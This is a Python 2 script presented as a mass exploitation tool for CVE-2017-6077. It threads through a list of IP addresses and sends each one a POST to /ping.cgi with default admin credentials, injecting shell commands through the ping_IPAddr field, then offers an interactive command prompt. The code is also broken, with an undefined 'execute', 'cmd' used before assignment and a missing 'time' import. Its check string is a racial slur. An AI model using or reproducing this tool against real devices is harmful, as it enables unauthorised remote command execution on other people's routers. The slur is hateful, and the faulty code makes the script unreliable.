CVE-2017-6077.py

import threading 
import requests 
import re
import sys

#CVE LINK :- https://www.exploit-db.com/exploits/41394/
#CVE AUTHOR :- SivertPL

if len(sys.argv) < 3:
    print \
    """
                                 CVE-2017-6077 Mass Scanner ~ by Souhardya Sardar (github.com/Souhardya)  
 __    __              __                                             
/  \  /  |            /  |                                            
$$  \ $$ |  ______   _$$ |_     ______    ______    ______    ______  
$$$  \$$ | /      \ / $$   |   /      \  /      \  /      \  /      \ 
$$$$  $$ |/$$$$$$  |$$$$$$/   /$$$$$$  |/$$$$$$  | $$$$$$  |/$$$$$$  |
$$ $$ $$ |$$    $$ |  $$ | __ $$ |  $$ |$$    $$ | /    $$ |$$ |  $$/ 
$$ |$$$$ |$$$$$$$$/   $$ |/  |$$ \__$$ |$$$$$$$$/ /$$$$$$$ |$$ |      
$$ | $$$ |$$       |  $$  $$/ $$    $$ |$$       |$$    $$ |$$ |      
$$/   $$/  $$$$$$$/    $$$$/   $$$$$$$ | $$$$$$$/  $$$$$$$/ $$/       
                              /  \__$$ |                             
                              $$    $$/                            
                               $$$$$$/        


"""
    print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
    sys.exit()
 

vulns = open(sys.argv[1], "r").readlines()
port = int(sys.argv[2]) # PORTS: 80 ,8080, 8081, Nas webinterface, Qconn , AndroMouse
login = 'admin' # ya can change
password = 'password' # same goes for password 


class send_payload(threading.Thread):
    def __init__ (self, ip):
        threading.Thread.__init__(self)
        self.ip = str(ip).rstrip('\n')
    def run(self):
        try:
            url = requests.post("http://" + self.ip + "/ping.cgi", data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping':"Ping", 'ping_IPAddr':"12.12.12.12; " + cmd}, auth=(login, password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
            print "PAYLOAD SENT: %s"%(self.ip)
            r = execute("echo niggered")
            if any("niggered" in s for s in r) == False:
                print "If you didnt got niggered your creds aren't right"
                return
            while True:
                cmd = raw_input("$ ")
                r = execute(cmd)
                for l in r:
                    print l.encode("utf-8")
        except:
            pass
            
for IP in vulns:
    try:
        ip = "".join(IP)
        ip = ip.replace("\n", "")
        t = send_payload(ip)
        t.start()
        time.sleep(0.09)
    except:
        pass